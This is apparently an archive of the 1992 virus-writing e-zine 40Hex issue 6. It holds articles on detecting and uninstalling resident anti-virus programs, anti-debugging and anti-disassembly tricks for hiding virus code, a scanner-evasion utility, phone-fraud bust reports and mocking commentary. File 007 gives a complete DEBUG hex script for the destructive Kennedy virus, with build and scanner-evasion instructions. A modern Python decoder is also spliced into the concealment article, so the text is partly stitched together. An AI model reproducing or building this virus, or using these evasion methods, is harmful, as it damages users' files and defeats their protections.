40Hex Number 6 Volume 2 Issue 2                                       File 000

Welcome to 40Hex issue 6. If this is your first time reading an issue of 40Hex, I welcome you, but recommend that you start with an earlier issue. This issue will have a Virus Spotlite on Creeping Death (Dir-2). It isn't in the normal Hex Dump format, and it is fully commented.

- Landfill is temporarily down (again!). This is due to several [NuKEd] hard drive controllers... we are down but NOT out. Hopefully we should be up within several weeks of the release of this issue. Hellraiser is still unable to edit the magazine; hopefully next issue he will be back in charge.

- I think we must discuss one problem. Recently, we have been verbally "attacked" by some lamers in the virus scene who like to jerk off on Fidonet. To clear up the issue at hand, we personally don't use all of the methods found in the articles. For example, we don't sit around all day and PKLite infected files and then remove the PKLite header. We let you people do it. As a matter of fact, we made it a hell of a lot easier due to this month's article called NoLite. No self-respecting virus group would do it. Not everyone that reads this magazine is a virus programmer, but wants to learn. Ya gotta start somewhere. Another person who has been insulting us on FidoNet is Sara Gordon. I do not know the whole story behind her hatred, but I know it stems from a phone conversation between her and Hellraiser. From what I understand, they disagreed on many topics, and HR may have gotten insulting (I don't know the whole story).

- Anyone that would like to submit articles, feel free to do so, as long as what you write is not stolen from another source and is of good quality. If you would like to write articles, contact any PHALCON/SKISM member or upload them to either Digital Warfare or PHUN LINE.
40 Hex Mag Issue 6                                                  April 1992

The Contents

File 000.............................You Are Here
File 001.............................Finding anti-viral programs in memory
File 002.............................Code Concealing: Part I
File 003.............................More Busts and Updates
File 004.............................The NoLite Utility
File 005.............................PHALCON/SKISM Update
File 006.............................Some Dick who wants to bust virus authors
File 007.............................The Kennedy Virus
File 008.............................Cornell students nailed for viruses
File 009.............................The Truth Behind Virus Scanners
File 00A.............................Virus Spotlite-Dir2 Full commented source
File 00B.............................Scan strings, and how to avoid them
File 00C.............................!Virus Contest!

Our Members:

Axiom Codex(*)-(Sysop of PHUNLINE)
Count Zero(*)-(Hacker, Amiga Programmer, Master of 150#)
CRoW MeiSTeR(K)-(Sysop of Crow Tech., Goob)
Dark Angel-(Programmer, Master Chef)
DecimatoR(*)-(Sysop of Digital Warfare, Programmer)
Demogorgon-(Hacker, Programmer)
Garbageheap-(Fearless Leader, Sysop of LandFill, Programmer)
Hellraiser-(Fearless Leader, Programmer)
Instigator(*)-(Terry Oakes' butt-buddy, 40 Hex writer)
Joshua Tower-(Electronics, MonkeyWrenching)
Lazarus Long-(Programmer)
Night Crawler-(Courier, Keeper of All Virii)
Orion Rogue-(Rouge?, named us, then laid back, and relied on name)
Paragon Dude-(Macintosh Programmer (lonely))
Renegade(*?)-(Hacker, Macintosh Programmer)
Time Lord(*)-(Sysop of USSR Systems)

(*)-Denotes persons who should avoid bending over for the soap, and invest in large quantities of KY Jelly.
(K)-Denotes persons who should get KY Jelly anyway.
(*?)-Denotes persons who came too close, and wisely backed off and also saved a fortune on KY Jelly.
Special Goodbyes to: Piff' (Sorry ya had to quit)

Greets to: Attitude Adjuster, Dekion, Loki, [NuKE], Suicidal Maniac, and our readers (do we have any?!?!?)

P.S. The transcript of the Alliance mentioned in last issue will NOT be released in this issue. This issue is just too damned packed to add another large file. It will be put into 40Hex-7, if we aren't in jail.

-)GHeap

40Hex Number 6 Volume 2 Issue 2                                       File 001

-------------------------------------------------------------------------------
Memory Resident Anti-Virus Detection and Removal
-------------------------------------------------------------------------------

Here is a list of ways to see if anti-viral utils are present in memory. I got the list out of PC Interrupts, a book by Ralf Brown. Here they are:

F-DRIVER.SYS (Part of the F-Protect virus package by Fridrik Skulason.)
This program "grabs" the INT 21 monitoring code, if it was not already taken by another program.
  INT 21h, Function 4Bh, Sub Function EEh
  AX must = 4BEEh at call, and call returns AX=1234h if F-Prot successfully grabbed INT 21, and AX=2345h if the grab failed.

F-DLOCK.SYS (A HD access restrictor, part of F-Protect Package)
  Call INT 2Fh, Funct. 46h, SubFunct 53h
  At call, AX must = 4653h, CX=0005h, BX=0000h
  If present in RAM, AX will return FFFFh.
  To uninstall, call with AX & CX the same as above, but BX=0001h. AX, ES, & BX will be destroyed.

F-LOCK.EXE (Part of F-Protect package, looks for "suspicious" activity)
  INT 2Fh, Funct 46h, SubFunct. 53h
  To call: AX=4653h, CX=0002h,
           BX=0000h (installation check)
           BX=0001h (uninstall)
           BX=0002h (disable v1.08 & below)
           BX=0003h (enable v1.08 & below)
  Call returns AX=FFFFh if installed (BX=0000h at call)
  AX, BX, and ES destroyed, if uninstalled (BX=0001 at call)

F-POPUP.EXE (Pop up menu for F-Protect)
  INT 2Fh, Funct. 46h, SubFunct. 53h
  To call: AX=4653h, CX=0004h, BX=0000h, 0001h or 0002h (See above - BX same as F-Lock)
  Returns: Same as F-LOCK.EXE

F-XCHK.EXE (Prevents execution of any progs which don't have self-checking code added by F-XLOCK)
  INT 2Fh, Funct. 46h, SubFunct 53h
  To Call: Registers = same as F-Popup, except CX=0003h, and BX=0000h (installation check) or 0001h (uninstall)
  Returns: same as F-LOCK, above.

TBSCANX (Resident Virus scanning Util by Frans Veldman)
  INT 2Fh, Function CAh, SubFunct 00h
  Call: AX=CA01, BX=5442h ("TB")
  Returns: AL=00h if not installed, AL=FFh if installed
           BX=7462h ("tb") if BX was 5442h during call
  INT 2Fh, Function CAh, Subfunction 02h (Set state of TBSCANX)
  Call: AX=CA02h, BL = new state (00h=disabled, 01h=enabled)

VDEFEND (Part of PC-Tools. Works on v7.0)
  INT 21h, Function FAh
  To call: AH=FAh, DX=5945h, AL=subfunction (01h to uninstall)
  Returns: CF set on error, DI = 4559h (?)

DATAMON (PC Tools 7.0 file protection)
  INT 2Fh, Funct 62h, Sub Funct 84h
  Call: AX=6284h, BX=0000h (for installation check), CX=0000h
  Returns: AX=resident code segment, BX & CX = 5555h

Flu Shot, or Virex PC
  INT 21h
  Call: AX=0FF0Fh
  Returns if either is installed: AX=101h

If anyone has any more Anti-Viral IDs, post 'em on Digital Warfare and I'll update this list.

---DecimatoR
   PHALCON/SKISM

40HEX_6_002

code    SEGMENT PUBLIC 'code'
        ORG     100H
        ASSUME  CS:CODE,DS:CODE,SS:CODE,ES:CODE
;******************************************************************************

Concealment: Keep Your Code Hidden From Prying Eyes
by Demogorgon/PHALCON/SKISM

Recently, I have been experimenting with a few new programming techniques that should be of great interest to the virus writing community. It is always our top priority to keep our code out of the hands of lamers in order to prevent the dreaded 'text change' and, above all, to cause the anti-virus community as much grief as possible. In order to do this, we must put a great deal of effort into concealing our code. That is the focus of this article.
This file is divided into two parts. The first part is devoted to developing 'debug resistant' code, and the second part deals with defeating disassemblers. I will not cover encryption, because methods of encryption are commonly known and there is really not much further I can go with that. For a complete review of self encryption methods, take a look at Dark Angel's Funky Virus Writing Guide (number three, the one that hasn't been released yet.)

Part I: The debugger is NOT your friend

The basic idea behind writing debug resistant code is finding a way to make your code behave differently when it runs under a debugger. With a real mode debugger, this is simplicity itself. All that is necessary is a little knowledge of how a debugger works. A debugger, such as DEBUG or TD, traces through a program by installing handlers for int 1 and int 3. These are called after every instruction is executed. A virus that wishes to avoid being debugged can simply replace the handlers for these interrupts, and the results will be just about whatever you want. Here is some code to do this:

eat_debug:
        push    cs
        pop     ds                      ; DS:DX must point at the new handler
        mov     dx, offset eat_int
        mov     ax, 2501h               ; AH=25h set vector, AL=01h: int 1 (single-step)
        int     21h
        mov     al, 03h                 ; same again for int 3 (breakpoint)
        int     21h
        ...                             ; rest of code
eat_int:
        iret                            ; both handlers now simply return

As you can see, this requires minimal space in your code, and is certainly worth the effort. You can experiment by placing something else at 'eat_int'. Another commonly used tactic is to disable the keyboard interrupt while certain parts of the code are being executed. This will surely keep lamers baffled, though a pro would recognize what was going on immediately. I am sure McAfee's programmers scoff at code such as this. Also note that while this will defeat the average real mode debugger, any protected mode debugger will step through this as if it weren't there. Playing with interrupts will not help you when your program will be running in a virtual CPU anyway. One method I found which will work nicely against TD386 is to throw in a hlt instruction. This will give TD an exception 13 error, and terminate the program. Anyone who is aware of this will just step over a hlt instruction, so methods must be used to conceal its presence, or to make it a necessary part of the code. This will be covered in Part II.

Another trick you can play is to call int 3 within your program. If someone tries to run your program under a debugger, it will stop each time int 3 is called. It is possible to trace through it, but it will be annoying if there are many int 3's thrown in.

Part II: Kill your disassembler

No matter how well you mess up debuggers, your program is entirely at the mercy of a programmer armed with a good disassembler. Unless, of course, you use techniques that will confuse disassemblers. My favorite method for baffling them is to create code that overlaps. Overlapping code may seem a little bit too complicated for most of us at first, but with the knowledge of a few instruction hex translations, you too can make effective overlapping code without sacrificing too much code size. Overlapping code can get as complex as you would like, but this file will only deal with the simplest examples.

eat_sr:
        mov     ax, 02EBh               ; the bytes EB 02 now sit at eat_sr+1
        jmp     $-2                     ; huh? jumps back into that immediate
        ...                             ; rest of code

This may confuse you at first, but it is fairly simple. The first instruction moves a dummy value into ax. The second instruction jmps into the value that was just moved into ax. '02EB' is stored as the bytes EB 02 (remember that words are stored low byte first), which decode as a short jump two bytes forward. This jump goes past the first jmp, and continues on with the code. This will probably not be sufficient to defeat a good disassembler like Sourcer, but it does demonstrate the technique. The problem with this is that Sourcer may or may not just pick up the code after commenting out the 'jmp $-2'. It is difficult to predict how Sourcer will respond, and it usually depends on the bytes that appear directly after the jmp. To severely baffle Sourcer, it is necessary to do some stranger things. Take a look at this example.
erp:
        mov     ax, 0FE05h
        jmp     $-2
        add     ah, 03Bh
        ...                             ; rest of code

This code is quite a bit more useful than the previous listing. Let us simulate what would happen if we were to trace through this code, showing a hex dump at each step to clarify things.

B8 05 FE EB FC 80 C4 3B         mov ax,0FE05h           ; ax=FE05h
^^ ^^ ^^
B8 05 FE EB FC 80 C4 3B         jmp $-2                 ; jmp into '05 FE'
         ^^ ^^
B8 05 FE EB FC 80 C4 3B         add ax,0EBFEh           ; 05 is 'add ax'
   ^^ ^^ ^^
B8 05 FE EB FC 80 C4 3B         cld                     ; a dummy instruction
            ^^
B8 05 FE EB FC 80 C4 3B         add ah,3Bh              ; ax=2503h
               ^^ ^^ ^^

The add ah,03Bh is there simply to put the value 2503h into ax. By adding five bytes (as opposed to simply using 'mov ax,2503h') this code will confuse disassemblers pretty well. Even if the instructions are disassembled properly, the value of ax will not be known, so every int call after this point will not be commented properly, as long as you never move a value into ax. You can conceal the value from the disassembler by using 'add ax' or 'sub ax' whenever possible. If you examine this closely, you can see that any value can be put into ax. Two of the values can be changed to whatever you want, namely the FE in the first line, and the 3B in the last line. It is helpful to debug through this chunk of code to determine what values should be placed here in order to make ax what you would like it to be.

Back to the subject of killing debuggers, it is very sneaky to hide something like a hlt instruction inside another instruction, such as a jmp. For example, take a look at this:

glurb:
        mov     cx, 09EBh
        mov     ax, 0FE05h              ;-\
        jmp     $-2                     ; >-- this should look familiar to you
        add     ah, 03Bh                ;-/
        jmp     $-10
        ...                             ; rest of code

The three lines in the middle are a repeat of the previous example. The important part of this code is the first line and the 'jmp $-10'. What happens is, the jmp goes back into the 'mov cx' instruction. The '09EB' is stored as EB 09, a short jump nine bytes forward. This lands on the '$-10' displacement byte of the 'jmp $-10'.
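The erp and glurb listings are easiest to understand by decoding them twice: once the way a one-pass (linear-sweep) disassembler does, and once the way the CPU or a tracing debugger does, following every jump. The Python below is an added example, not code from the article; its byte strings are constructed from the two listings, and the decoder handles only the handful of 8086 opcodes they use.

```python
"""Linear-sweep vs. flow-following decoding of the erp/glurb listings.

Added example, not code from the article. The byte strings below are
constructed from the two listings; the decoder handles only the few 8086
opcodes they use, which is enough to show where a one-pass disassembler
and the CPU part ways.
"""
from dataclasses import dataclass
from typing import Optional

# erp:   mov ax,0FE05h / jmp $-2 / add ah,3Bh
ERP = bytes.fromhex("B805FEEBFC80C43B")
# glurb: mov cx,09EBh / mov ax,0FE05h / jmp $-2 / add ah,3Bh / jmp $-10
GLURB = bytes.fromhex("B9EB09B805FEEBFC80C43BEBF4")


@dataclass
class Insn:
    offset: int
    length: int
    mnem: str                     # mnemonic without operands
    text: str                     # full disassembly line
    imm: Optional[int] = None     # immediate operand, if any
    target: Optional[int] = None  # destination of a short jump, if any


def decode_one(code: bytes, off: int) -> Insn:
    """Decode the instruction at `off` from the subset the listings use."""
    op = code[off]
    word = int.from_bytes(code[off + 1:off + 3], "little")  # imm16, low byte first
    if op == 0xB8 and off + 3 <= len(code):
        return Insn(off, 3, "mov ax", f"mov ax,{word:04X}h", imm=word)
    if op == 0xB9 and off + 3 <= len(code):
        return Insn(off, 3, "mov cx", f"mov cx,{word:04X}h", imm=word)
    if op == 0x05 and off + 3 <= len(code):
        return Insn(off, 3, "add ax", f"add ax,{word:04X}h", imm=word)
    if op == 0x80 and code[off + 1:off + 2] == b"\xC4" and off + 3 <= len(code):
        return Insn(off, 3, "add ah", f"add ah,{code[off + 2]:02X}h", imm=code[off + 2])
    if op == 0xEB and off + 2 <= len(code):
        rel = int.from_bytes(code[off + 1:off + 2], "little", signed=True)
        tgt = off + 2 + rel  # rel8 is measured from the *next* instruction
        return Insn(off, 2, "jmp short", f"jmp short {tgt:02X}h", target=tgt)
    if op == 0xFC:
        return Insn(off, 1, "cld", "cld")
    if op == 0xF4:
        return Insn(off, 1, "hlt", "hlt")
    return Insn(off, 1, "db", f"db {op:02X}h")  # anything else: raw byte


def linear_sweep(code: bytes) -> list[Insn]:
    """What a one-pass disassembler prints: decode back to back from offset 0."""
    out, off = [], 0
    while off < len(code):
        insn = decode_one(code, off)
        out.append(insn)
        off += insn.length
    return out


def follow_flow(code: bytes) -> list[Insn]:
    """What the CPU (or a tracing debugger) executes: take every jump."""
    out, off, seen = [], 0, set()
    while 0 <= off < len(code) and off not in seen:
        seen.add(off)  # stop if the code loops back on itself
        insn = decode_one(code, off)
        out.append(insn)
        if insn.mnem == "hlt":
            break
        off = insn.target if insn.target is not None else off + insn.length
    return out


def emulate_ax(code: bytes) -> int:
    """Track AX along the executed path (the article's ax=2503h result)."""
    ax = 0
    for insn in follow_flow(code):
        if insn.mnem == "mov ax":
            ax = insn.imm
        elif insn.mnem == "add ax":
            ax = (ax + insn.imm) & 0xFFFF           # 16-bit wraparound
        elif insn.mnem == "add ah":
            ah = ((ax >> 8) + insn.imm) & 0xFF      # 8-bit add into the high byte
            ax = (ah << 8) | (ax & 0xFF)
    return ax


def hidden_offsets(code: bytes) -> list[int]:
    """Instruction starts the CPU reaches that a linear sweep never decodes."""
    swept = {i.offset for i in linear_sweep(code)}
    return [i.offset for i in follow_flow(code) if i.offset not in swept]


if __name__ == "__main__":
    for name, code in (("erp", ERP), ("glurb", GLURB)):
        print(f"--- {name}: linear sweep")
        for i in linear_sweep(code):
            print(f"  {i.offset:02X}: {i.text}")
        print(f"--- {name}: executed path")
        for i in follow_flow(code):
            print(f"  {i.offset:02X}: {i.text}")
        print(f"  hidden instruction starts: {[f'{o:02X}' for o in hidden_offsets(code)]}")
    print(f"erp leaves ax = {emulate_ax(ERP):04X}h")
```

Run stand-alone it prints both views for each listing; the glurb path ends on the F4 at offset 0Ch, which the linear sweep shows only as the displacement byte of the last jmp.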
The $-10 just happens to be stored as 0F4h, the hlt instruction. By making the hlt part of another instruction, it is not visible when it is being traced through by TD386. It is also not possible to remove it without altering the code.

The purpose of this article is not to supply code to be thrown into your own programs. The purpose is to get you to think about new ways to avoid having your code looked at and modified by others. The most important thing is to be original. It is pointless for you to simply duplicate this code, because anyone else who has read this file will already know what you are trying to do.

code    ENDS
        END     concealment

40Hex Number 6 Volume 2 Issue 2                                       File 003

Well, there have been plenty of busts in 1992, so here is the run down to the best of my knowledge for anyone who is interested:

Asphi: Busted by MCI on January 20 for hacking on 476's. Had to pay $2700 for the phone calls he made. From what I found out MCI wants to nail him to the wall. Charges include: Unlawful use of a computer, Credit Card Fraud, Theft of Services, Criminal Conspiracy and some more I can't think of, 10 or so total. And of course they took his system. He is going to have a trial, but a date has not yet been set.

Axiom Codex: Billed $2000 for equal access codes.

Cold Steel: Billed $40.00 for 476's.

Count Zero: Yet another that got nailed for 476's. Billed $86.63 and had to tell his parents.

Deathblade: Billed $100 for 476's.

Dekion: Also nailed for 476's. Not sure if he will be charged. Billed somewhere between $100 - $1000.

Genghas Khan: Nailed for CBI and for 733's. Not sure about what will happen to him, but I heard from his friend that he is really screwed.

Instigator: I got nailed in the 476 ring too. They took my system but gave it back. I got billed for $1970.17. I got charged with 1 count of Theft of Services. They dropped the other 8 charges. I am going to be on informal probation for a short period.
Marauder: Raided last year by GBI, they took his computer equipment and never gave it back. They finally decided to charge him with some misdemeanors.

Netrunner: Billed $100 for 476's.

Terminal: Arrested same time as Genghas Kahnvict. He is NOT a minor...

VenoM: 476's again. Billed $75.00 and had to tell his parents.

*** AND the LAMEST bust of the month award goes to: DecimatoR - for sitting in his car along a main road while using the beige box! He ran up a whopping $0.81 phone bill before the cop came by and asked him if he was having car trouble and saw the wires running from the car into the telephone pole. He was arrested, then released. No charges have been filed.... yet!

*** AND the second LAMEST bust of the month award goes to: Hot Rize - for wisely running his neighbor's phone line into his own house. No one would notice that one, eh? We also received confirmed reports that he is a dweeb.

-------------------------------------------------------------------------------

All 4 PHALCON/SKISM joints went down between January and March. The Landfill for security reasons, Digital Warfare because of me getting busted, PHUN LINE for security reasons, and USSR because Time Lord may be getting busted. Digital Warfare went back up though, with DecimatoR as sysop.

** Apparently the head of the 476 operations is Terry Oakes. He is the phone fraud investigator in charge of the TeleConnect investigations. Give him a ring at 800-476-1234 Ext. 3045. Thank you.

** References to 476's are referring to 800-476-9696 owned by Teleconnect, a subsidiary of MCI. (6 Digit Calling Cards - Get a LAMER to hack 'em)

** Make sure you change your passwords if you use the same one on Digital Warfare as you do on other boards. They have the OLD user list.

** Additions to the list will be on a first busted, first added basis.
-Instigator

40Hex Number 6 Volume 2 Issue 2                                       File 004

NOLITE v1.0
By DecimatoR of PHALCON/SKISM
PD War Collection Program 1

This program will remove the PKLITE header from .EXE and .COM files for two reasons.

A) To make the file un-decompressable, which doesn't mean much if you have the registered version of PKLITE.

B) More importantly, it makes the PKLITEd file unscannable to virus scanners, such as McAfee's Virus Scan etc...

Does this by overwriting the header with random text from memory.

Parameters are simple:

NOLITE filename.ext (Extension MUST be included!)

Will remove the header from PKLITEd files. It will not remove the header if it is not a genuine PKLITE file.

Note: This program is based on PKSMASH, which was written by Hellraiser. Unfortunately, a bug surfaced in that program, which caused it to lock up sometimes. So I wrote this to replace PKSMASH, and stole HR's dox.

---DecimatoR

Cut out the following code, call it NOLITE.HEX, then DEBUG < NOLITE.HEX

------------- Rip here ---------- Slice here ---------- Mince Here ----------

------------- Rip here ---------- Slice here ---------- Mince Here ----------

40Hex Number 6 Volume 2 Issue 2                                       File 005

I'm back, well kind of. Anyways, a lot of people have been asking, "What's going on with the group?" The question should be, "What's going on with any group these days?" It seems to me that 1992 was the death of h/p, or at least the "ice age" of it. Everybody was either getting busted or quitting the scene. Oh well, what can I say about it. Our group has been having bad luck too. Five (now six) busted as well as other assorted bad things happening to members.

Anyways, what's going on with us, huh? Well, the reason you haven't heard much from us is because we haven't been releasing our new stuff to BBS systems (BBS system sounds as redundant as PIN number, I know) because we have a strong feeling that members of such groups as the CVIA are logging on to h/p boards in the hope of snatching the latest viruses. Well, not much you can do about it if you run a BBS, unless you personally know everyone who calls your board.
But come to think of it - what good does it prove to release your newest creation to the general public (of the h/p crowd) via BBS system? Isn't that the same principle as the warez puppy scene? I guess you all can do whatever turns you on, but we kind of decided that it would be in our best interests to release our stuff to BBS's only after they have been detected by the popular scanners or until they are kind of old. Not to fear, 40-HEX and "Dark Angel Phunky Writing Guide" will still be on boards at the same rate as always.

As for all of you people bitching that we no longer have sites and that we are dead, well you're dead - wrong. The current sites are as follows (in no specific order) - Digital Warfare (yes it's back, at a new number however), Time Lord's BBS (The U.S.S.R System), The Phunline (yes it's back), and the newest addition - Crow Technology. And as for us being dead, yeah right.

** Note from DecimatoR: The U.S.S.R System recently went down, due to Time Lord getting into a little hot water. It WILL return however... we're just not sure when. **

** Note from GHeap: I am coming back, gimme mo' time!

So now with that out of the way, on to the other news. Hmmm..... Michelangelo caused quite a scare there for a while. It was pretty cool to see John, Patti, and the rest of the crew on T.V... John Dvorak has a new half hour computer talk show on syndicated radio. I'm sure he wouldn't mind if we got on the show some time soon. Check your local radio guide for your local station and time...

I am offering a standing bounty of $1,500 for the person willing to fly to Ohio and kick Crow Meister's ass for good. A minor would be preferred, being that he is under 18 and if I smashed him I could get sued or something. Just kidding, Crow Meister is cool with me, hihihihi...

A new federal law is being considered which, if passed, will outlaw the authorship of computer viruses totally, research or not. Read more about that later in this issue...

Hey, I might have a BBS up soon!
I have been saying that for the past 2 years, haven't I? Well, that's the news as I see it; it's nice to be writing for this rag again.

Check ya in 25 to life....

Hellraiser
P/S 1992

This article was typed by Time Lord for HR cuz he is WAY too lazy to send me a disk in place of a fuckin print out...

40Hex Number 6 Volume 2 Issue 2                                       File 006

Well, this little news "tid-bit" came from Attitude Adjuster, one of the few non-PHALCON/SKISM contributors (ok, the ONLY non P/S member). Thanks a lot dude, keep the submissions coming. The article itself is quite sad, and makes me question the intelligence of our opposition.

-)GHeap&Demo

Thanx to CZ for THE line.

-------------------------------------------------------------------------------

- We need Computer Virus Snitches -
Written By Mike Royko, Tribune Media Services.
Retyped by The Attitude Adjuster
============================================================================

Millions of computer users are wondering how to protect themselves against the wave of viruses that are threatening their machines. I have a suggestion. [So do I, avoid Bnu 1.90Beta]

First, they should remember that these viruses don't spring from nature. They are little computer programs that are created and sent on their way by people that are brainy, malicious and arrogant. [I am not brainy]

So, the question is, how do you find the creators of computer virus programs?

Because they are arrogant, it's likely that they want someone to know what a clever thing they have done. They won't hold a press conference [Actually, we do hold press conferences. See Michael Alexander@Computerworld] but chances are they will brag to a trusted friend or acquaintance or fellow hacker.

It is sad, but the world is full of snitches. [Get a thesaurus] Look at John Gotti, the nation's biggest Mafia boss. There was a time when it was unthinkable for even the lowest-level Mafia soldier to blab. But now Gotti has to sit in court while his former right-hand man tells about how they got people whacked. [We whack people too]

So if Mafia figures can be persuaded to tattle [Na-na-na-na-na], is there any reason to believe that nerds have a greater sense of honor and loyalty? [Yes, we also have brains]

Of course[.] not, but how do you get them to do it? Money. [Now yer talking... my mom is really the Dark Avenger, I want my money now.]

These companies [what companies, I only hit hospitals] could use petty cash to place ads in the computer magazines and on the electronic bulletin boards. [Ok, call my BBS and post this tidbit. 40Hex now has ad space available] The ads would say something like: "A $50,000 reward for any information leading to the arrest and conviction of virus authors." [How can you convict a virus author. It isn't illegal. Go play Tank Wars.]

The next question would be what to do with the virus makers once they have been caught. And that's the key to putting an end to the problem: something that could be posted on those electronic bulletin boards that might cause an aspiring virus-maker to go take a brisk walk instead.

A judge would sit and listen to an attorney who would say something like this:

"Your honor, what we have here is an otherwise fine young man from a good family. His father is a brilliant scholar, and the son will someday be the same." [I am going to be a certified scholar when I grow up.]

"What he did was no more than an intellectual prank, a cerebral challenge of sorts. Like the man who climbed Mount Everest because it was there, he created the virus and sent it forth because it was there."

Then, we can hope, the judge might say something like this:

"Yes, I am impressed by the defendant's brain power. And I expected you to ask me to give him a slap on the wrist."

"However, he is not a child. He is an adult. And I would think that so brilliant a grown man would know better than to amuse himself by screwing with the lives of strangers." [I haven't screwed one stranger]

"It's as if he hid inside the businesses and institutions until they were closed and everyone had gone home. Then he came out and went through every filing cabinet and drawer and shredded or burned every bit of useful information he could find." [Cool! Let's try it.]

"Now, counselor, what would you and your law partners say if some street mope [See Thesaurus] did that to your firm - crept in and destroyed every document in your offices? Including the names of clients that owe you money. Hah, you would be in here asking me to hang him from a tree." [I love hanging from trees]

"So don't give me that smart kid from a good family routine. [I ain't smart, and family ain't good] He is a self-centered, insensitive, uncaring, arrogant goofball [And damn proud]. He didn't give a second thought to the chaos or heartbreak he would cause an adoption agency, a hardworking businessman or a medical clinic." [Yes I did. I aim for them.]

"Therefore, I sentence him to the maximum sentence the law allows in the local jailhouse [0, NUL, ZIP-o, /dev/null, etc..], which is a really terrible place, filled with all sorts of crude, insensitive hulks." [Jay-walkers]

"Bailiff, please get the defendant up off the floor and administer some smelling salts." [More like, why is the defendant laughing?]

"And change his trousers, quickly." [Fuck you]

[] comments added by Demogorgon and GHeap
============================================================================

I hope you enjoyed that one as much as I did! Okay, I see some really neat things with this man's article. First off, I'm sure he's an adept programmer... that is, he can probably figure out how to get his VCR to tape something while he is off writing his brilliant articles. I enjoy his narrow-minded definition of virii (that was mentioned in 40Hex 5); of course, all virii are those evil overwriting, trigger date, resident, boot track infecting swine (yeah, he probably learned what a virus was from watching ABC News covering the Michelangelo crisis!) I also enjoy his opinion that all virus authors are nerds. First off, what the hell is a nerd? I mean, I have written a virus before (not saying it was any good), but I don't feel like a nerd! In fact, I feel quite superior to most of the idiots like this guy. And, I like his great statement about my loyalty. Yes, I'm gonna narc on [PHALCON/ [Forget this again, and die]]SKISM for $50,000!!! Yeah, right. There are a lot of narcs on this not-so-good earth, so choose your friends wisely. I'm quite sure that ads on BBS's (electronic bulletin boards! No... cork ones!) would just sufficiently pump up user discussion of virii.

I'm not scared of fed intervention, and I doubt any authors I know are either. This was touched on in 40Hex 5: virus authors are not responsible for the spread of their virii unless they are actively spreading them! I mean, it's not my fault that K-Rad Man sent my Hard Drive Blender (slices, dices, minces sectors) to 1000 Bible boards in Utah. Apparently it hasn't dawned on this guy that most virii are not written to be destructive. Actually, that's a lie. There are a lot of virii out there that are destructive, but that is changing. People like the PHALCON/SKISM crew realize that not everything must be destructive, opening the doors to much larger virus projects (i.e. Bobisms).

One more thing... QUIT EQUATING THE WORD 'hacker' TO EVERY DAMN TYPE OF ELECTRONIC 'crime!!!'

I'm gonna get this dude's phone #, I say we call him sometime...
-The Attitude Adjuster-

40Hex Number 6 Volume 2 Issue 2 File 007

Let's see what good ole' Patty has to say about this:

Virus Name: Kennedy
Aliases: Dead Kennedy, 333, Kennedy-333
Scan ID: [Kennedy]
V Status: Endangered
Discovered: April, 1990
Symptoms: .COM growth; message on trigger dates (see text); crosslinking of files; lost clusters; FAT corruption
Origin: Denmark
Eff Length: 333 Bytes
Type Code: PNCKF - Parasitic Non-Resident .COM Infector
Detection Method: ViruScan, Pro-Scan, VirexPC, F-Prot, VirHunt 2.0+, NAV, IBM Scan 2.00+, AVTK 4.32+, VIRx 1.6+, CPAV 1.0+, Novi 1.0.1+, Sweep 2.3.1+, UTScan
Removal Instructions: F-Prot, VirHunt 2.0+, or delete infected files

General Comments: The Kennedy virus was isolated in April 1990. It is a generic infector of .COM files, including COMMAND.COM. This virus has three activation dates: June 6 (assassination of Robert Kennedy 1968), November 18 (death of Joseph Kennedy 1969), and November 22 (assassination of John F. Kennedy 1963) of any year. On activation, the virus will display the following message: "Kennedy is dead - long live 'The Dead Kennedys'" The following text strings can be found in the viral code: "\command.com" "The Dead Kennedys" Systems infected with the Kennedy virus will experience cross-linking of files, lost clusters, and file allocation table errors (including messages that the file allocation table is bad).
--------------------------------Cut Here------------------------------------ n kennedy.com e 0100 E9 0C 00 90 90 90 CD 20 4B 65 6E 6E 65 64 79 E8 e 0110 00 00 5E 81 EE 0F 01 8B AC 0B 02 B4 2A CD 21 81 e 0120 FA 06 06 74 28 81 FA 12 0B 74 22 81 FA 16 0B 74 e 0130 1C 8D 94 0D 02 33 C9 B4 4E CD 21 72 09 E8 17 00 e 0140 72 04 B4 4F EB F3 8B C5 05 03 01 FF E0 8D 94 20 e 0150 02 B4 09 CD 21 EB EF B8 00 43 BA 9E 00 CD 21 89 e 0160 8C 55 02 B8 01 43 33 C9 CD 21 B8 02 3D CD 21 8B e 0170 D8 B4 3F 8D 94 52 02 8B FA B9 03 00 CD 21 80 3D e 0180 E9 74 05 E8 7E 00 F8 C3 8B 55 01 89 94 0B 02 33 e 0190 C9 B8 00 42 CD 21 8B D7 B9 02 00 B4 3F CD 21 81 e 01A0 3D 65 64 74 DE 33 D2 33 C9 B8 02 42 CD 21 83 FA e 01B0 00 75 D0 3D E8 FD 73 CB 05 04 00 89 84 5B 02 B8 e 01C0 00 57 CD 21 89 8C 57 02 89 94 59 02 B4 40 8D 94 e 01D0 05 01 B9 4D 01 CD 21 72 15 B8 00 42 33 C9 BA 01 e 01E0 00 CD 21 B4 40 8D 94 5B 02 B9 02 00 CD 21 8B 8C e 01F0 57 02 8B 94 59 02 B8 01 57 CD 21 B4 3E CD 21 E8 e 0200 02 00 F9 C3 B8 01 43 8B 8C 55 02 CD 21 C3 03 00 e 0210 2A 2E 43 4F 4D 00 5C 43 4F 4D 4D 41 4E 44 2E 43 e 0220 4F 4D 00 4B 65 6E 6E 65 64 79 20 65 72 20 64 9B e 0230 64 20 2D 20 6C 91 6E 67 65 20 6C 65 76 65 20 22 e 0240 54 68 65 20 44 65 61 64 20 4B 65 6E 6E 65 64 79 e 0250 73 22 0D 0A 24 00 00 00 00 00 00 00 00 00 00 00 e 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 rcx 027F w q ---------------------------------Cut Here----------------------------------- Ok there it is. Not the most impressive virus around and its caught by just about every scan on the market, but take PKLite to it and then remove the PKLite header (Use NOLITE in this issue) and no one will be able to find it. Anyway it gets the job done. To make the above hex into a working file, first cut on the dotted lines. Name the resulting file KENNEDY.TXT. Then: DEBUG < KENNEDY.TXT and you'll have a working virus. 
-Instigator

40Hex Number 6 Volume 2 Issue 2 File 008

Take a look at this. I picked it up on fidonet, originally from Virus-L digest. All the stuff in *< >*'s is my comments.

- Demogorgon

------------------------------

VIRUS-L Digest   Wednesday, 26 Feb 1992   Volume 5 : Issue 44

------------------------------

Date: Tue, 25 Feb 92 10:10:14 -0500
From: mha@baka.ithaca.ny.us (Mark Anbinder)
Subject: MBDF Suspects Arrested (Mac)

